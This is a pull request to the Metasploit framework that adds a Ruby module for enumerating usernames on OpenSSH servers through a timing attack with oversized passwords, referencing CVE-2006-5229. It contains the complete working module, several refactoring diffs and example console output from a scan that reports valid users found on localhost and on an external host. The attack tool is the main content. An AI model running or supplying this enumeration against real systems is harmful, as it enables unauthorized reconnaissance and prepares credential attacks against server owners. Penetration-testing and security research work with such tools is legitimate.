### PR TITLE
Add OpenSSHD user enumeration module

### DIFF
--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -1,0 +1,169 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::CommandShell
+
+  attr_accessor :ssh_socket, :good_credentials
+
+  THRESHOLD = 10
+
+  def initialize
+    super(
+      'Name'        => 'SSH Username Enumeration',
+      'Description' => %q{
+        This module uses a time-based attack to enumerate users in a OpenSSH server.
+      },
+      'Author'      => ['kenkeiras'],
+      'References'  => [],
+      'License'     => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptString.new('USER_FILE',
+                      [true, 'File containing usernames, one per line', nil]),
+        Opt::RPORT(22)
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG',
+                    [false, 'Enable SSH debugging output (Extreme verbosity!)',
+                      false]),
+
+        OptInt.new('SSH_TIMEOUT',
+                   [false, 'Specify the maximum time to negotiate a SSH session',
+                     10]),
+
+        OptInt.new('RETRY_NUM',
+                   [true , 'The number of attempts to connect to a SSH server' \
+                     ' for each user', 3])
+      ]
+    )
+
+    deregister_options('RHOST')
+    @good_credentials = {}
+  end
+
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def retry_num
+    datastore['RETRY_NUM']
+  end
+
+
+  def check_user(ip, user, port)
+    pass = 'A' * 64_000
+
+    opt_hash = {
+      :auth_methods  => ['password', 'keyboard-interactive'],
+      :msframework   => framework,
+      :msfmodule     => self,
+      :port          => port,
+      :disable_agent => true,
+      :password      => pass,
+      :config        => false,
+      :proxies       => datastore['Proxies']
+    }
+
+    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    start_time = Time.new
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh_socket = Net::SSH.start(ip, user, opt_hash)
+      end
+
+    rescue Rex::ConnectionError, Rex::AddressInUse
+      return :connection_error
+
+    rescue Net::SSH::Disconnect, ::EOFError
+      return :success
+
+    rescue ::Timeout::Error
+      return :success
+
+    rescue Net::SSH::Exception
+    end
+
+    finish_time = Time.new
+
+    if finish_time - start_time > THRESHOLD
+      return :success
+    else
+      return :fail
+    end
+  end
+
+
+  def do_report(ip, user, port)
+    report_auth_info(
+      :host => ip,
+      :port => rport,
+      :sname => 'ssh',
+      :user => user,
+      :active => true
+    )
+  end
+
+
+  def user_list
+    return File.new(datastore['USER_FILE']).read.split
+  end
+
+
+  def attempt_user(user, ip)
+    attempt_num = 0
+    ret = nil
+
+    while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
+
+      if attempt_num > 0
+        select(nil, nil, nil, 2**attempt_num)
+        print_debug "Retrying '#{user}' on '#{ip}' due to connection error"
+      end
+
+      ret = check_user(ip, user, rport)
+      attempt_num += 1
+    end
+    return ret
+  end
+
+
+  def show_result(attempt_result, user, ip)
+    case attempt_result
+    when :success
+      print_good "User '#{user}' found on #{ip}"
+      do_report(ip, user, rport)
+      :next_user
+
+    when :connection_error
+      print_error "User '#{user}' on #{ip} could not connect"
+      :abort
+
+    when :fail
+      print_debug "User '#{user}' not found on #{ip}"
+
+    end
+  end
+
+
+  def run_host(ip)
+    print_status "Starting scan on #{ip}"
+    user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
+  end
+end

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -23,7 +23,10 @@ class Metasploit3 < Msf::Auxiliary
         This module uses a time-based attack to enumerate users in a OpenSSH server.
       },
       'Author'      => ['kenkeiras'],
-      'References'  => [],
+      'References'  =>
+          [
+            ['CVE', '2006-5229']
+          ],
       'License'     => MSF_LICENSE
     )
 

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -14,8 +14,6 @@ class Metasploit3 < Msf::Auxiliary
 
   attr_accessor :ssh_socket
 
-  THRESHOLD = 10
-
   def initialize
     super(
       'Name'        => 'SSH Username Enumeration',
@@ -34,6 +32,10 @@ class Metasploit3 < Msf::Auxiliary
       [
         OptString.new('USER_FILE',
                       [true, 'File containing usernames, one per line', nil]),
+        OptInt.new('THRESHOLD',
+                      [true,
+                     'Amount of seconds needed before a user is considered ' \
+                     'found', 10]),
         Opt::RPORT(22)
       ], self.class
     )
@@ -64,6 +66,9 @@ class Metasploit3 < Msf::Auxiliary
     datastore['RETRY_NUM']
   end
 
+  def threshold
+    datastore['THRESHOLD']
+  end
 
   def check_user(ip, user, port)
     pass = Rex::Text.rand_text_alphanumeric(64_000)
@@ -102,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
 
     finish_time = Time.new
 
-    if finish_time - start_time > THRESHOLD
+    if finish_time - start_time > threshold
       return :success
     else
       return :fail

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('USER_FILE',
+        OptPath.new('USER_FILE',
                       [true, 'File containing usernames, one per line', nil]),
         OptInt.new('THRESHOLD',
                       [true,

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -152,11 +152,9 @@ class Metasploit3 < Msf::Auxiliary
     when :success
       print_good "User '#{user}' found on #{ip}"
       do_report(ip, user, rport)
-      :next_user
 
     when :connection_error
       print_error "User '#{user}' on #{ip} could not connect"
-      :abort
 
     when :fail
       print_debug "User '#{user}' not found on #{ip}"

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
   def check_user(ip, user, port)
-    pass = 'A' * 64_000
+    pass = Rex::Text.rand_text_alphanumeric(64_000)
 
     opt_hash = {
       :auth_methods  => ['password', 'keyboard-interactive'],

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -106,9 +106,9 @@ class Metasploit3 < Msf::Auxiliary
     finish_time = Time.new
 
     if finish_time - start_time > threshold
-      return :success
+      :success
     else
-      return :fail
+      :fail
     end
   end
 
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
   def user_list
-    return File.new(datastore['USER_FILE']).read.split
+    File.new(datastore['USER_FILE']).read.split
   end
 
 
@@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
       ret = check_user(ip, user, rport)
       attempt_num += 1
     end
-    return ret
+    ret
   end
 
 

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
     while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
 
       if attempt_num > 0
-        select(nil, nil, nil, 2**attempt_num)
+        Rex.sleep(2 ** attempt_num)
         print_debug "Retrying '#{user}' on '#{ip}' due to connection error"
       end
 

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -12,8 +12,6 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::CommandShell
 
-  attr_accessor :ssh_socket
-
   def initialize
     super(
       'Name'        => 'SSH Username Enumeration',
@@ -90,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
 
     begin
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        ssh_socket = Net::SSH.start(ip, user, opt_hash)
+        Net::SSH.start(ip, user, opt_hash)
       end
 
     rescue Rex::ConnectionError, Rex::AddressInUse

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::CommandShell
 
-  attr_accessor :ssh_socket, :good_credentials
+  attr_accessor :ssh_socket
 
   THRESHOLD = 10
 
@@ -55,7 +55,6 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     deregister_options('RHOST')
-    @good_credentials = {}
   end
 
 

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -53,8 +53,6 @@ class Metasploit3 < Msf::Auxiliary
                      ' for each user', 3])
       ]
     )
-
-    deregister_options('RHOST')
   end
 
 


### PR DESCRIPTION
Add OpenSSHD user enumeration module.

Uses a time based attack to determine whether or not a user may log in a SSH server as described on this Full Disclosure thread: http://seclists.org/fulldisclosure/2013/Jul/88, differs from original aproach on using a 64,000 character string instead of a 39,000 one.

Tested on OpenSSH 6.5p1, marked as [CVE-2006-5229](http://cvedetails.com/cve/2006-5229/). 
### Example output

```
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > info

       Name: SSH Username Enumeration
     Module: auxiliary/scanner/ssh/ssh_enumusers
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  kenkeiras

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      22               yes       The target port
  THREADS    1                yes       The number of concurrent threads
  THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
  USER_FILE                   yes       File containing usernames, one per line

Description:
  This module uses a time-based attack to enumerate users in a OpenSSH
  server.

References:
  http://cvedetails.com/cve/2006-5229/

msf auxiliary(ssh_enumusers) > set RHOSTS 127.0.0.1, codigoparallevar.com
RHOSTS => 127.0.0.1, codigoparallevar.com
msf auxiliary(ssh_enumusers) > set THREADS 2
THREADS => 2
msf auxiliary(ssh_enumusers) > set USER_FILE /home/kenkeiras/Documentos/test_user_list
USER_FILE => /home/kenkeiras/Documentos/test_user_list
msf auxiliary(ssh_enumusers) > run

[*] Starting scan on 192.73.235.93
[*] Starting scan on 127.0.0.1
[!] User '1234' not found on 127.0.0.1
[!] User '1234' not found on 192.73.235.93
[!] User 'admin' not found on 127.0.0.1
[!] User 'bind' not found on 127.0.0.1
[!] User 'bluestash' not found on 127.0.0.1
[!] User 'admin' not found on 192.73.235.93
[!] User 'hackliza' not found on 127.0.0.1
[!] User 'bind' not found on 192.73.235.93
[!] User 'bluestash' not found on 192.73.235.93
[+] User 'kenkeiras' found on 127.0.0.1
[!] User 'postfix' not found on 127.0.0.1
[!] User 'root' not found on 127.0.0.1
[!] User 'user' not found on 127.0.0.1
[*] Scanned 1 of 2 hosts (050% complete)
[+] User 'hackliza' found on 192.73.235.93
[+] User 'kenkeiras' found on 192.73.235.93
[!] User 'postfix' not found on 192.73.235.93
[!] User 'root' not found on 192.73.235.93
[!] User 'user' not found on 192.73.235.93
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >
```
